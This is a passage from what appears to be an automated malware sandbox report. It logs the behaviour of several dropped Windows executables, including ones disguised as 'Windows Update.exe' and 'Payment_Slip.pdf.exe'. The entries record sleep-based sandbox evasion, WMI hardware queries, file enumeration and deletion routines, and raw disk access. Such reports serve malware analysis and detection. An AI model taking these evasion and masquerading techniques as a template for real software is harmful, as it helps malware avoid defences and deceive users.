                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe TID: 8424Thread sleep count: 38 > 30
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe TID: 8424Thread sleep time: -35048813740048126s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe TID: 8428Thread sleep count: 3777 > 30
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe TID: 8428Thread sleep count: 6042 > 30
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -37815825351104557s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -1200000s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -1199875s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -1199758s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -1199631s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -1199380s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -1199078s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -600000s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -599869s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -599764s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -599656s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -599546s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -599437s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -599328s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -599218s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -599109s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -598999s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -598889s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -598781s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -598669s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -598562s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -598453s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -598343s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -598234s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -598124s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -598012s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -597906s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -597796s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -597397s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -597281s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -597171s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -597062s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -596952s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -596843s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -596734s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -596624s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -596515s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -596406s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -596296s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -596187s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -596077s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -595968s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -595859s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -595749s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -595640s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -595531s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -595421s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -595312s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -595202s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -595041s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -594935s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -594820s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592Thread sleep time: -594718s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe TID: 8700Thread sleep time: -34126476536362649s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8892Thread sleep count: 5278 > 30
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -24903104499507879s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -1200000s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -1199890s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8892Thread sleep count: 4521 > 30
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -1199781s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -1199672s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -1199530s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -600000s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -599875s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -599765s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -599656s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -599547s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -599437s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -599328s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -599219s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -599109s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -599000s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -598890s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -598781s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -598662s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -598531s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -598422s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -598250s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -598124s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -598015s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -597906s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -597797s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -597687s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -597578s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -597468s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -597358s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -597250s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -597140s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -597029s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -596921s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -596812s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -596703s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -596593s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -596484s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -596375s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -596265s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -596156s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -596046s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -595937s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -595827s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -595714s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -595588s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -595359s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904Thread sleep time: -595250s >= -30000s
                              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\host.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                              Source: C:\Users\user\AppData\Roaming\host.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041A01B
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_0040B28E
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_0040838E
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_004087A0
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,11_2_00407848
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004068CD FindFirstFileW,FindNextFileW,11_2_004068CD
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0044BA59 FindFirstFileExA,11_2_0044BA59
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040AA71
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,11_2_00417AAB
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040AC78
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0040AE51 FindFirstFileW,FindNextFileW,14_2_0040AE51
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 15_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407C87
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407898
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0041A01B
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0040B28E
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_0040838E
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_004087A0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_00407848
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_004068CD FindFirstFileW,FindNextFileW,17_2_004068CD
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0044BA59 FindFirstFileExA,17_2_0044BA59
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040AA71
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00417AAB
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040AC78
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_00406D28
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_00418981 memset,GetSystemInfo,14_2_00418981
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 1200000
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 1199875
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 1199765
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 1199655
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 1199546
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 1199437
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 600000
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 599875
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 599765
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 599644
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 599441
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 599263
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 599155
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 599047
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 598937
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 598828
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 598710
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 598594
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 598484
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 598375
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 598265
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 598156
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 598043
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 597937
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 597828
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 597718
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 597609
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 597500
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 597390
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 597281
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 597168
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 597051
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 596922
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 596812
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 596687
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 596532
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 596406
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 596296
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 596187
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 596078
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 595968
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 595859
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 595750
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 595640
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 595531
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 595422
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 595312
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 595203
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1200000
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1199875
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1199758
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1199631
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1199380
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1199078
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 600000
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599869
